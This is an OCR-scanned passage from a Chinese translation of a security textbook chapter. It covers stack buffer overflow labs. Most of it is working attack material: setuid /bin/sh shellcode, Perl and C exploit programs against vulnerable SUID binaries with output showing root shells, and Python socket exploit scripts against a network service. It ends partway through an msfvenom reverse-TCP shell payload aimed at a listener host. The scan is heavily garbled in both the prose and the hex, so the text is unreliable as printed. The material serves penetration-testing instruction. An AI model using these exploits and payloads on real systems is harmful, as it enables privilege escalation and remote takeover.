们 留 下 了 犯错 的 小 空间 (一 两 个 字 市 )。 现在 使 用 Per 在 命令 行 上 用 低位 优先 字 市 序 
(little-endian) 格 式 编 写 该 地址 。 


perl =- "print" ra "rN 


这 里 使 用 简单 的 取 模 运算 来 计算 出 数字 39; 
(412 字 节 -NOP 的 200 字 节 - shellcode 的 59 字 节 ) / 4 字 节 =39 


如 果 将 Perl 命 令 放 在 反 引 写 () 中 ， 就 可 将 多 个 命令 拼接 起 来 形成 更 大 的 字符 串 
或 数值 。 例如, 可 按 下 面 的 命令 制作 一 个 412 字 节 的 攻击 字符 串 并 将 其 传 给 有 漏洞 的 
meet.c 程 序 : 

$ ./meet Mr "perl -e 'print "\x90"x200 . 

"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\ 

x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xc 

d\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" . 

"NAxcONxf3NxffVxbf"x39'^ 

Segmentation fault 

LU FADE A a BREEN BS — PS BBR BE PTD US 

e 200 字 节 的 NOP("\x90") 

e 594i Myshellcode 

e 156 字 节 的 重复 返回 地 址 (由 于 x86 处 理 器 采用 低位 优先 字 节 序 ， 因 此 需要 


肥 转 ) 
段 错 误 显 示 汤 洞 攻击 程序 朋 江 了。 可 能 的 原因 在 于 香 复 地 址 在 填充 时 并 未 对 齐 。 


也 就 是 说 ， 这 些 重 复 地 址 没有 正确 或 彻 撒 地 将 堆栈 上 保存 的 返回 地 址 童 写 。 为 验证 
这 一 点 ， 只 需要 增加 所 用 的 NOP 数 目 即 可 : 


S ./meet Mr "perl -e 'print "\x90"x201 . 
"\x31\xc0O\x31\xdb\xb0\x17\xcd\x80\xeb\x1f£\x5e\x89\x76\x08\x31\xc0\ 
x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xc 
d\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" . 
"xcO0\xf3\xff\xbf"x39"° 

Segmentation fault 

$ ./meet Mr “perl -e 'print "\x90"x202 . 
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1£\x5e\x89\x76\x08\x31\xc0\ 
x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xc 
d\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" . 
"\xcO\xf3\xff\xbf"x39'~ 
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Segmentation fault 
S ./meet Mr “perl -e 'print "\x90"x203 . 
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f£\x5e\x89\x76\x08\x31\xc0\ 
x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xc 
d\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" . 
"xc0O\xf3\xff\xbf"x39°"° 
Hello ©OO0000000000000000OOOOOOOOOOOOOOOOOOO OOOO 
OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO0 
OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO0 
te he te te by be be be be bo be bo to be oe oe Oo to bo be be be bo bo he to he he bt be 
OOOOO0O0OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO00 
OO1O01O0^O1O0O0FOF 
© 
99990v 

1390 9 
99949/pD05i1n/53999999999909999O90909099990909O990990909299909290J9929 
99999990999 GPO P99G9GOG99 9999999 9999999999999 
9999999999 O9999O9O999O9O99999O999O999O99O999O99O99JO929029 9999 
999909999999 O99990O99990O999999099O9O99JO99099O9999O9O9J929 49409 
99 
# 1d 
uid=0 (root) gid-1000(joeuser) groups=1000 (joeuser) 


成 功 了 ! 这 里 很 重要 的 一 点 是 要 明白 ， 与 编译 和 调试 代码 相 比 ， 命 令 行 是 如 
使 我 们 能 够 更 高 效 地 进行 试验 和 调整 数值 的 。 
11.3.3 ”实验 11-4: 使 用 通用 漏洞 攻击 代码 进行 堆栈 洪 出 漏洞 攻击 


下 和 面 的 代码 是 网 上 以 及 参考 手册 中 众多 堆栈 演出 漏洞 攻击 代码 的 变种 。 由 于 能 
在 许多 场合 下 进行 多 种 漏 铀 攻击， 因此 从 这 个 意义 上 讲 是 通用 的 。 


aT 


/fexploit.c 
#include <unistd.h> 
#include <stdlib.h> 
#include <string.h> 
#include <stdio.h> 
char shellcode[] = //setuid(0) & Alephl's famous shellcode, see ref. 
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" //setuid(0) first 
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 
"\x80\xe8\xdc\xff\xff\xff/bin/sh"; 
//Small function to retrieve the current esp value (only works locally) 
unsigned long get sp(void) { 

asm ("movl $esp, $eax"); 
} 


int main(int argc, char *argv[1]) { //main function 


int i, offset = 0} //used to count/subtract later 
unsigned int esp, ret, *addr ptr; //used to save addresses 
char *buffer, *ptr; //two strings: buffer, ptr 
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} 


int size = 500; //default buffer size 
esp = get sp(); //get local esp value 
if(argc > 1) size = atoi (argv[1]); //if 1 argument, store to size 


if (argc > 2) offset = atoi(argv[2]); //if 2 arguments, store offset 
if (argc > 3) esp = strtoul (argv[3], NULL, 0) ; //used for remote exploits 
ret — esp - offset; //calc default value of return 


/ /print directions for usefprintf (stderr, "Usage: $s«buff size» «offset» 
«esp:Oxfff...»Mn", argv[0]); //print feedback of operation 
fprintf (stderr, "ESP:0x%x Offset:0x%x 
Return: 0x%x\n", esp, offset, ret) ; 
buffer = (char *)malloc(size); //allocate buffer on heap 
ptr = buffer; //temp pointer, set to location of buffer 
addr ptr = (unsigned int *) ptr; //temp addr ptr, set to location of ptr 
//Fill entire buffer with return addresses, ensures proper alignment 
for(1-0; 1 < size; i+=—4) [ // notice increment of 4 bytes for addr 
*(addr ptrt++) = ret; //use addr ptr to write into buffer 
} 
//Fill 1st half of exploit buffer with NOPs 
for (i=0; i < size/2; i++) { //notice, we only write up to half of size 
buffer[i] = '\x90'; / /place NOPs in the first half of buffer 


} 
//Now, place shellcode 


ptr = buffer + size/2; //set the temp ptr at half of buffer size 
for (i=0; i < strlen(shellcode); i++){ //write 1/2 of buffer til end of sc 
*(ptr++) =shellcode[i]; / /write the shellcode into the buffer 


} 

//Terminate the string 

buffer [size-1]=0; //This is so our buffer ends with a x\0 
//Now, call the vulnerable program with buffer as 2nd argument. 
execl("./meet", "meet", "Mr.",buffer,0);//the list of args is ended w/0 
printf ("%$s\n",buffer); //used for remote exploits 

//Free up the heap 

free (buffer); //play nicely 

return 0; //exit gracefully 


这 个 程序 设置 了 一 个 名 为 shellcode 的 全 局 变量 ， 其 中 保存 着 用 于 生成 shell 的 恶 
意 机 器 人 码 ( 十 六 进 制 格 式 )。 接 下 来 定义 了 一 个 函数 , 它 将 返回 本 地 系统 上 ESP 寄 存 砷 
的 当前 值 。main0 浮 数 接收 3 个 参数 ， 分 别 可 以 选择 用 于 设置 溢出 缓冲 区 的 大 小 、 绥 
冲 区 和 ESP 的 偏 移 以 及 远程 漏洞 攻击 的 手工 ESP 值 。 用 户 操 作 指 南 显示 在 屏幕 上 , 随 
后 显示 的 是 用 到 的 内 存 位 置 。 然 后 从 头 开始 构建 恶意 缓冲 区 ， 依 次 填充 地 址 、NOP 
和 shellcode， 而 后 用 空 字符 结束 该 缓冲 区 。 最 后 将 该 缓冲 区 注入 存在 漏洞 的 本 地 程 
序 ， 同 时 将 其 显示 到 屏幕 上 (对 于 远程 漏洞 攻击 比较 有 用 )。 

下 面 在 exploitc 上 试验 这 种 新 的 漏洞 攻击 代码 : 
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4 gcc -ggdb -mpreferred-stack-boundary-2 -fno-stack-protector -z execstack -o 
exploit exploit.c 

# chmod uts meet 

# useradd -m joe 

H su joe 

S ./exploit 500 -300 

Usage: ./exploit«buff size» «offset» «esp:Oxfff...» 


EBSP:OxbffffZdc Offset:Oxfffffed4  Return:Oxbfffft408 
Hello SO000000000000000000000000000000000000000000 


O00000000000000000000000000000000000000000000000 
O00000000000000000000000000000000000000000000000 


DT 


F EF EF EF 4X SF EF XA SF X MT Ay, XP XU EF CU X, SF EF CU X X UU EF EF TF XU XU EF XU XU XP X EF XP X XP X UF WW XP SF X X Y] 


999999999969 
999999999999999999999999999999999999991|91:9^9:99797 
9 


1 Oe 099999 /5i1n/3n999999999999999999999999999949949949 
9990999909999999999990999990999990999999099990999 


22M gid-1000(joeuser) groups=1000 (joeuser) 

RIJ Y! 注意 本 例 是 如 何以 根 用 己 吴 份 编 详 程序 并 将 其 设置 为 SUID 程 序 的 。 接 
着 将 权限 切换 成 一 个 普通 用 户 并 运行 漏洞 攻击 程序 。 我 们 得 到 一 个 运行 民 好 的 根 
shell。 请 注意 ， 在 使 用 大 小 为 5300 字 节 的 缓冲 a 像 使 用 Perl 进 行 试验 时 


LIN vho H | B. Sir 


ARE ART. EA Ariel H CE tall PE S EHE 
内 部 调用 的 。 一 般 而 言 ，: 这 是 调用 有 漏洞 程序 的 一 P PES 实际 结 HR 
可 能 会 有 所 不 同 。 


11.3.4 实验 11-5: 对 小 缓冲 区 进行 漏洞 攻击 


如 果 湄 洞 绥 冲 区 太 小 以 至 于 无 法 将 其 用 作 前 面 摘 述 的 漏洞 攻击 缓冲 区 ， 会 发 生 
什么 情况 呢 ? 大 部 分 shellcode 代 码 的 大 小 为 21~50 字 节 。 如果 找到 的 源 凋 缓冲 区 只 有 
10 字 节 ， 该 怎么 办 呢 ? 例 如， 先 来 研究 下 和 面 这 个 使 用 小 绥 冲 区 的 漏洞 代 人 码 : 


- 
# cat smallbuff.c 
//smallbuff.c This is a sample vulnerable program with a small buffer 
#include <string.h> 
int main(int argc, char * argv[]){ 
char buff[10]; //small buffer 
strcpy( buff, argv[1]); //problem: vulnerable function call 
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现在 编 详 它 并 设置 为 SUID 程 序 : 


# gcc -ggdb -mpreferred-stack-boundary-2 -fno-stack-protector -z 
execstack \-o smallbuff smallbuff.c 

# chmod ut+s smallbuff 

# ls -1 smallbuff 


-mr 1 root root 4192 Apr 23 00:30 smallbufft 
# cp smallbuff /home/joe 

# su - joe 

S pwd 

/home/joe 


S 
既然 已 经 有 了 这 样 一 个 程序 ， 那 么 如 何 对 它 进 行 漏洞 攻击 呢 ? 答案 是 使 用 环境 


变量 。 可 将 shellcode 存 储 到 一 个 环境 变量 中 ， 或 者 存储 到 内 存 中 的 其 他 未 个 地 方 ， 
然后 将 返回 地 址 指 疝 这 个 环境 变量 ， 如 下 所 示 : 


#include <stdlib.h> 

#include <string.h> 

#include <unistd.h> 

#include <stdio.h> 

#define VULN "./smallbuff" 

#define SIZE 160 

char shellcode[] = //setuid(0) & Alephi's shellcode + NOP Sled, see ref. 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" //setuid(0) first 
"\xeb\x1lf\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 
"\x80\xe8 \xdc\xff\xff\xf£/bin/sh"; 

int main(int argc, char **argv) { 


// injection buffer 

char p[SIZE]j; 

// put the shellcode in target's envp 
char *env[] = { shellcode, NULL }; 


// pointer to array of arrays, what to execute 
char *vuln[] = { VULN, p, NULL }; 
int *ple, 1, addr; 


// calculate the exact location of the shellcode 
addr = Oxbffffffa - strlen(shellcode) - strlen(VULN); 
fprintf(stderr, "[***] using address: %t#010x\n", addr); 


/* fill buffer with computed address */ 
ptr = (int *) (pt2); //start 2 bytes into array for stack alignment 
tor (i = 02 1 < SIZE; 1 += 4)1 
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*ptr++ = addr; 
} 


//call the program with execle, which takes the environment as input 
execle(vuln[0], (char *)vuln,p,NULL, env); 
exit (1); 
} 
joeuserG8kali:/tmp$ gcc -o exploit2 exploit2.c 
joeuser@kali:/tmps ./exploit2 
[***] using address: 0xbfffff8a 
9999999999999 to ton to to lo to to to ta ta tt to ta on to to on to to to to to to tt a d 
9999991]991]:9^9)199197 
© 
OOOOV 
13590799 
HOF/bin/sh 
# id 
uid=0 (root) gid-1000(joeuser) groups-1000(joeuser) 


这 样 做 为 何 会 奏效 呢 ? 事实 上 这 项 技术 是 由 一 位 名 叫 Murat Balaban 的 土耳其 黑 

客 发 布 的 , 它 依赖 于 以 下 事实 : 所 有 Linux ELF 文 件 在 映射 到 内 存 中 时 会 将 最 后 的 相 

对 地 址 设 为 0xbfffffff。 第 2 章 曾 讲 过 ， 环 境 变 量 和 参数 存储 在 这 个 区 域 。 在 这 些 数据 
的 下 方 紧 接着 就 是 堆栈 。 图 11-4 详 细 描 绘 了 进程 内 存 的 高 地 址 部 分 。 

进程 内 存 的 高 地 址 部 分 


0xbtiiiiia 


内 存 低地 址 部 分 : a 
0x11111111 shellcode 的 地 址 内 存 高 地 址 部 A. 


图 11-4 示意 图 
注意 ， 和 内存 的 高 病 以 空 人 结尾 ， 接 痢 是 程序 名 称 ， 然 后 是 环境 变量 ， 最 后 是 参 
数 。 下 面 的 代码 行 取 目 exploit2.c， 它 将 进程 环境 变量 的 值 设置 成 shellcode: 
char *env[] = { shellcode, NULL }; 
上 述 操作 将 shellcode 的 开头 放 在 了 精确 位 置 : 


Addr of shellcode-O0Oxbfftftftftfta-length (program 
name)-length(shellcode). 


下 面 使 用 gdb 对 其 进行 验证 。 首 先 ,为 了 帮助 调试 ， 在 shellcode 的 开头 放 入 \xcc， 
这 样 就 可 在 shellcode 执 行 时 让 调试 器 终止 。 接 下 来 ， 重 新 编译 程序 并 将 其 加 载 到 调 
vag: 
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# gcc -o exploit2 exploit2.c 4 after adding \xcc before shellcode 
i gdb exploit2 --quiet 

(no debugging symbols found)... (gdb) 

(gdb) r 

Starting program: /tmp/exploit2 

Oxbfffff8a 

process 13718 is executing new program: /tmp/smallbuff 
9999999999999 bo ton bon boy ho ton ta ho to to to to to to tt to ta to to te te te te 999€ 
9999991|91:9^91990917 


[***] using address: 


9 
9999; 
1390: 99 

999 /bin/sh 
Program received signal SIGTRAP, Trace/breakpoint trap. 
Oxbfffffba in ?? () 
(gdb) x/32z Oxbfffff8a 
Oxbfffff8a: 0x90909090 10x90909090  0x90909090  0x90909090 
Oxbfffff9a: 0x90909090 10x90909090  0x90909090  0x90909090 
Oxbfffffaa: 0x90909090  0x90909090  0x90909090  0xcc909090 
Oxbfffffba: Oxdb31c031  0x80cd17b0  0x895elfeb  0xc0310876 
Oxbfffffca: 0x89074688 0x0bb00c46  0x4e8df389 0x0c568d08 
Oxbfffffda: Oxdb3180cd Oxcd40d889  Oxffdce880  0O0xo622fffff 
Oxbfffffea: 0x732f6e69  0x2f2e0068  0x6c616d73 0x6675626c 
Oxbffffftfa: 0x00000066 Cannot access memory at address Oxc0000000 


执行 有 \xcc 字 符 的 程序 时 可 看 到 ， 当 执行 停止 时 ， 消 息 稍 有 不 同 。 这 里 ， 因 为 
添加 的 \xcc 创 建 了 一 个 软 断 点 ,程序 保 止 时 显示 信号 SIGTRAP。 当 程序 执行 过 到 \xcc 
时 ， 程 序 停止 ， 表 明 应 用 程序 成 功 地 为 shellcode 创 建 了 入 口 。 


eae JS c AIF AE 


RE HEAR, Be PORE TAI. FESS, WEF 
并 不 总 是 像 meetc 示 例 那 么 简单 ， 有 时 可 能 需要 经 历 一 个 反复 的 过 程 才 能 成 功 实施 
漏洞 攻击 。 漏 洞 攻击 的 开发 过 程 通常 遵循 以 下 步骤 : 

(1) 控制 EIP 

(2) 确定 偏 移 量 

(3) 确定 攻击 同 量 

(4) 生成 shellcode， 也 就 是 构建 漏洞 攻击 

(5) 验证 漏洞 攻击 

(6) 如 有 必要 ， 调 试 漏洞 攻击 程序 

在 刚刚 开始 做 渗透 测试 的 时 候 ， 应 该 完全 章 循 这 些 步 又 。 束 练 以 后 可 以 根据 需 
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要 将 基 些 步 又 合 j 
实验 11-6: 构建 定制 漏洞 攻击 


让 我 们 来 看 个 全 新 的 示例 。 此 应 用 程序 名 为 chl1_6， 可 从 本 书 GitHub 库 下 载 。 
1. 控制 EIP 


chll 6 程序 是 一 个 网 络 应 用 ， 当 我 们 运行 它 时 ， 可 发 现 它 在 端口 5$3553 上 侦 听 : 
root@kali:~/book# ./ch11 6 & 

[1] 27702 

root@kali:~# netstat -anlp | grep chil 6 

tcp 0 0.0.0.0:5555 0.0.0.0:* LISTEN 712/ch11 6 


SAN UEP A INES GAR EN FB BU RBIS. FEA PRO, Hj 
netcat 连 接 运 行 中 的 二 进 制程 序 : 


root@kali:~/book# nc localhost 5555 


Username: Test 
Invalid Login! 
Please Try again 


现在 ， 用 Perl 创 建 一 个 很 长 的 字符 串 ， 并 将 其 作为 用 户 名 友 送 全 netcat 连 接 : 
root@kali:~/book# perl -e "print "A"x8096'| nc localhost 5555 
Username: root@kali:~/book# 


我 们 的 二 进 制程 序 在 应 对 长 字符 串 时 表现 异常 。 为 查 明 原因 ， 需 要 使 用 调试 器 。 
在 一 个 窗口 中 通过 gdb 运 行 漏洞 程序 ， 而 在 另 一 窗口 中 发 送 长 字符 串 。 
图 11-$ 展 示 了 当 发 送 长 字符 串 时 调试 窗口 里 用 生 了 什么 。 


Chll# gdb a Chil © 
Reading symbols from h11 6...(no debugging symbols found)...done. 
(gdb) set follow-fork- d child 
(gdb) r 
Starting program: /root/Chll/chll 6 
[New process 14297] 


Thread 2.1 "chll 6" received signal SIGSEGV, Segmentation fault. 
[5witching to process 14297] 

0x41414141 in ?? () 

(gdb) i r eip esp ebp 

0x41414141 0x41414141 

Oxbffff368 Oxbffff368 

0x41414141 0x41414141 


(gdb) 


图 11-5 “在 一 个 窗口 中 使 用 调试 器 ， 而 在 另 一 个 窗口 中 发 送 长 字符 串 ， 可 发 现 EIP 和 EBP 都 被 重 写 了 
典型 的 缓冲 区 溢出 , 并 且 重 写 了 EIP。 这 样 我 们 就 完成 了 漏洞 攻击 开发 过 程 
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的 第 一 步 ， 下 面 进行 第 二 步 。 
2. VERTES 


控制 了 EIP 后 ， 我 们 需要 确切 地 知道 使 用 多 少 个 字符 才能 干净 (不 多 不 少 ) 地 履 兰 
EIP。 做 到 这 一 点 的 最 简单 办 法 是 使 用 Metasploit 的 模式 工具 。 
首先 创建 一 个 Python 脚本 来 连接 侦 听 器 。 


#!/usr/bin/python 
import socket 


total = 1024 # Total Length of Buffer String 


S = socket.socket () 
s.connect (( localhost”, 39593} ) 
print s.recv(1024) 

exploit = "A"*total + "Xn" 
s.send(exploit) 


Connect to server 
Receive Banner 

Build Exploit String 
Send Exploit String 


s.close 


“4 gdb fi FB HEFFER — T B H1 3811 Python AES] , 我 们 仍然 
应 该 看 到 程序 骨 沉 。 如 果真 是 这 样 ， 那 么 说 明 Python 脚 本 工作 正常 。 接 下 来 ， 我 们 
需要 确切 地 算出 使 缓冲 区 发 生 洲 出 的 字符 数 。 为 此 ,我 们 像 下 和 面 这 梓 使 用 Metasploit 
的 pattern create 工具 : 


# /usr/share/metasploit-framework/tools/exploit/pattern create.rb -1 1024 
Aa0AalAa2Aa3Aa4Aa5Aa6Aa /Aa8Aa9AbOAb1Ab2Ab3Ab4AD5AD6ADb 7AD8AbD9ACOAC1AC2AC3 
Ac4AcSAc6Ac /AcGAc9AdOAdlAd2Ad3AdAAd5AdO6Ad /Ad6Ad9Ae0A61Ae2Ae3Ae4Ae5Ae6Ae / 
Ae8Ac 9ATOATIATZATS3AT4AL SAT OAL Af SAf 9Aq0Aq1Ag2Aq3Ag4 Aq 5Ag6Ag /Ag8Ag9Ah0Ah1 
Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9A10A11A12A13A14A15A16A17A18A19A3j0A]1A32A]3A3]4A3]5 
AJ6AJ7AJ8AJ 9AkOAkl1Ak2AK3AkKAAk5AKkOAk7AKk8Ak9A10A11A12A13A14A15A16A17A18A19 
AmO0Am1 Am2Am3Am4 Am» Am6óAm / Am8Am9AnO0An]An2An3An4Anb5Anó6An/An8An9AOo00AO01A02A03 
Ao4AOo5Ao06Ao /AoO8AO9ApÜAplAp2Ap3ApAAp5ApO6Ap / Ap8Ap9Aq0Aq1Aq2Aq3Aq4AqoAqeAq 7 
Aq8Aq9ArOArlAr2Ar3ArAAr5Ar6Ar/Ar8Ar9ASO0AS1AS2AS3ASA4AASDASOAS /As8As9AtTOATL 
At2ZAt3At 4AtT SAT OAT /ATBAT 9AuO0Au1Au2Au3AuA4Au5Au6Au Au Au9AvOAv1Av2Av3AvAAvO 
AvoAv /Av8Av 9AwWOAw]1Aw2Aw3Aw4AwSAw6Aw /Aw8Aw9Ax0Ax1Ax2Ax3Ax4AxSAx6Ax/Ax8Ax9 
AyOÜAylAy2Ay3AyAAyDAyOAy /Ay8Ay9Az0AzZ1AzZ2AZ3Az4AzZ5Az 6Az /AzSAz9Ba0BalBa2Ba3 
Ba4Ba5Baó6Ba /Ba8Ba9BbOBb1 Bb2Bb3Bb4Bb5Bb6Bb/Bb8Bb9BcOBc1Bc2Bc3Bc4BeSBce6Bc/ 
Bc8Bc 9BdOBd1 Ba2Bd3Bd4Bd5Bd6Bd /Bd8Bd9Be0OBel1Be2Be3Be4Be5Be6Be 7Be8BeS9Bf OBf 1 
Bf2Bf3BfABf5Bf6Bf /Bf8Bf9BgOBg1Bg2Bqg3Bg4Bg5Bg6Bg /Bg8Bg9BhOBh1 Bh2Bh3Bh4Bh5 
Bh6Bh7Bh8Bh9Bi OB 


然后 将 其 运用 到 漏洞 攻击 程序 中 : 


#!/usr/bin/python 
import socket 


total = 1024 # Total Length of Buffer String 
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= | = mm 

sc t= 

"Aa0AalAa2Aa3Aa4Aab5Aa6Aa /Aa8Aa9AbD0AbDIAbZAbDSAbD4AbDSAbDOAbD /AbD8AD9ACOAcT 
AcC2AC3ACAACDACOAC/ACOACO9AdOAdlAd2Ad3Ad4Ad5Ad6Ad /Ad8Ad9Ae0Ae61Ae2Ae3 
Ae 4Ae5Ae 6Ae /AedAe 9ATOATIALZAT3SAF4AT SALT OAL/ALTSATIAGDAGIAG2ZAg3Ag4Ag5 
Ag6Ag7Ag8Ag9AhO0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9A10A11A12A13A14A15A16A17 
Ai 8Ai 9Aj]0Aj1A)]2Aj 3A) 4A] 5A) 6A) 7A) 8AJ SAKOAKIAK2AkK3AK4AK5AK6AK7AkK8Ak9 
Al0AI1AI2A13A14A15A16A17A18A19AmO0Am1 Am2Am3 Am4 Am5 Am6 Am Am8 Am9AnO0An1 
An2An3An4Anb5AnóAn/An8An9AoO0AO1AO2AO3AOAAO5AOO6AO/AOOBAO9ApOAplAp2Ap3 
ApAAp5ApoAp/Ap8Ap9Aq0Aq1Aq2Aq3AqAAq5AqoAq/Aq8Aq9ArÜArl1Ar2Ar3ArAAr»5 
Ar6Ar/Ar8Ar9ASO0ASIAS2AS3ASAASDASOAS/ASOASOALOAUTIAUC2AC3AUCAAUDACOACU/ 
AtGAt9Au0AulAu2Au3Au4Aub5Au6Au/Au8Au9AvOAv1Av2Av3AvAAvOAvOAv AvOAv9 
AwO0Aw1Aw2Aw3AwAAw5AwOAW/AWOAWOAxXÜAxXlAxX2ZAxXS3AxAAxXDAXOAx/AxXOAX9AyÜOAyl 
Ay2AyS3AyAAy5DAy6Ay IAyOAy9AZOÜAZIAZZ2ZAZ3SAZzAAZDAZzZO6AzIAzOAz9BaÜBalBa2Ba3 
Ba4Ba5Ba6Ba /Ba8Ba9BbOBb1Bb2Bb3BbABb5Bb6Bb7Bb8Bb9BcOBc1Bc2Bc3Bc4Bc5 
BcoBc /Bc8Bc9BdOBd1Bqd2Bd3BdA4Bd5BdoBd /Bd8Bd9Be0Be1Be2Be3BeA4Be5Be6Be7 
Be8Be9BfOBfÍl1Bf2Bf3BfABf5BfOBf/BfSBf9BgOBglBg2Bg3Bg4Bg5Bg6Bg/Bg8Bq9 
BhOBh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9B10B" 


S = socket.socket () 

s.connect (("localhost", 3955) } # Connect to server 
print s.recv(1024) # Receive Banner 
exploit = sc # Build Exploit String 
s.send(exploit) # Send Exploit String 
Ss.close 


现在 运行 漏洞 攻击 程序 ， 在 gdb 中 将 得 到 不 同 的 段 错误 的 位 置 值 : 


Thread 2.1 "chill 6" received signal SIGSEGV, Segmentation fault. 
[Switching to process 14448] 

0x41386941 in ?? () 

(gdb) 


EIP 在 这 里 被 设 为 0x41386941 。Metasploit 的 pattern create 工具 有 一 个 姊妹 工具 
pattern_offset。 我 们 可 将 EIP 的 值 传 给 patterm_offset 以 找 出 它 在 原始 模式 中 对 应 的 位 
A, Mim seer xX MARE: 

/usr/share/metasploit-framework/tools/exploit/pattern offset.rb 


-] 1024 \-q 0x41386941 
[*] Exact match at offset 264 


FUE AE PRIX 8 V] P AE te x CEEIP 9 E 53 27 IB] BI264 Fo itf BAL HESS 
EPH ESMA BU LA TAA fe KE «Z3 Dd el Doc FEY HJJT BOUE HP ER 
ANAE, BAAD AAR FERIA NICA RAF 1024 Fo KAR P AE ASTE] Jc In] shell AC ch toy 
提供 了 足够 的 空间 。 
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3. 人 确定 攻击 同 量 


一 旦 知道 EIP 的 重 写 位 置 , 焉 必须 确定 为 执行 载荷 所 要 跳 转 到 的 堆栈 地 址 。 为 此 ， 
我 们 在 代码 中 加 入 了 NOP 雪 机。 这 给 了 我 们 一 个 更 大 的 跳 转 区 域 ， 因 此 即使 位 置 发 
生 少量 偏 移 ， 也 仍 能 跳 转 到 NOP 雪 权 所 在 之 处 。 添 加 了 长 上 度 为 32 的 NOP 雪 权 后 ， 应 
该 能 窗 麻 ESP， 并 具备 在 可 跳 转 地 址 方面 额外 的 灵活 性 。 记 住 ，\x00 会 修 视 为 字符 
串 终止 标记 ， 任 何 带 有 \x00 的 地 址 都 不 起 作用 。 


#!/usr/bin/python 
import socket 


total = 1024 # Total Length of Buffer String 
off = 264 # Offset to EIP 

sc = "m # Shellcode Block 

cp o "A" 

noplen - 32 # Length of NOP Sled 

Jmp = "BBBB" # Dummy EIP overwrite 

S = socket.socket () 

Ss.connect((" localhost"”, 25931] # Connect to server 

print s.recv(1024) # Receive Banner 

exploit = "" # Build Exploit String 


exploit += "A"*off + jmp + "\x90"*noplen + sc 
exploit +="C"* (total-off-4-len (sc) -noplen) 


s.send (exploit) # Send Exploit String 
s.close 


如 果 EIP 计 算 正 确 无 误 的 话 ， 当 启动 gdb 并 运行 上 面 新 的 漏洞 攻击 代码 时 ， 我 们 
应 该 会 发 现 EIP 被 四 个 B 字 符 履 盖 。 有 了 这 些 新 变化 ， 我 们 应 该 能 够 检查 堆栈 以 查找 
NOP 雪 构 的 位 置 。 


(gdb) set follow-fork-mode child 
(gdb) 工 

Starting program: /root/Ch11/chl1l1 6 
[New process 14469] 


Thread 2.1 "chill 6" received signal SIGSEGV, Segmentation fault. 
[Switching to process 14469] 

@0x42424242 in ?? () 

(gdb) x/32z Sesp 

O0xbffff368: 0x90909090  0x90909090  0x90909090  0x90909090 
Oxbffff378: 0x90909090  0x90909090  0x90909090  0x90909090 
ƏOxbffff388: 0x43434341  0x43434343  0x43434343 0x43434343 
Oxbffff398: 0x43434343 0x43434343  0x43434343 0x43434343 
Oxbffff3a8: 0x43434343 0x43434343  0x43434343  0x43434343 
Oxbffff3b8: 0x43434343 0x43434343  0x43434343 0x43434343 
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Oxbffff3c8: 0x43434343 0x43434343  0O0x43434343  0x43434343 
Oxbffff3d8: 0x43434343 | 0x43434343  0x43434343 0x43434343 


可 看 到 EIP@ 被 重 写 了 。 在 0xbffftft4b8 四 处 开始 填充 NOP 指 令 ， 因 此 有 一 个 返回 
地 址 。 最 后 的 部 分 是 NOP 雪 要 之 后 的 地 址 范围 ， 即 C 字 答 所 在 之 处 四 。 这 将 是 被 
shellcode 于 弃 的 区 域 ， 所 以 如 果 跳 转 到 NOP 雪 榴 @， 它 会 将 我 们 直接 带 入 shellcode。 


4. 生成 shellcode 


当然 可 从 头 开始 开发 漏洞 攻击 程序 ， 但 Metasploit 在 这 方面 能 为 我 们 做 很 多 。 可 
通过 msfvenom 生成 一 些 shellcode ， 在 我 们 的 模块 中 工作 。 我 们 将 使 用 
linux/x86/shell reverse tcp 模块 创建 一 个 连接 到 某 个 shell 的 套 接 字 ， 而 该 shell 会 通过 
与 侦 听 占 的 连接 返回 。 


root@kali:~/book# msfvenom -p linux/x86/shell reverse tcp -f python ^ 

LHOST-192.168.192.192 LPORT-8675 

No platform was selected, choosing Msf::Module::Platform::Linux from 
the payload 

No Arch selected, selecting Arch: x86 from the payload 

No encoder or badchars specified, outputting raw payload 

Payload size: 68 bytes 

Final size of python file: 342 bytes 

buf = "" 

buf += "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xel\xb0\x66" 

buf += "\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xcO" 

buf += "\xa8\xc0\xc0\x68\x02@\x00\x21\xe3\x89\xel\xb0\x66\x50" 

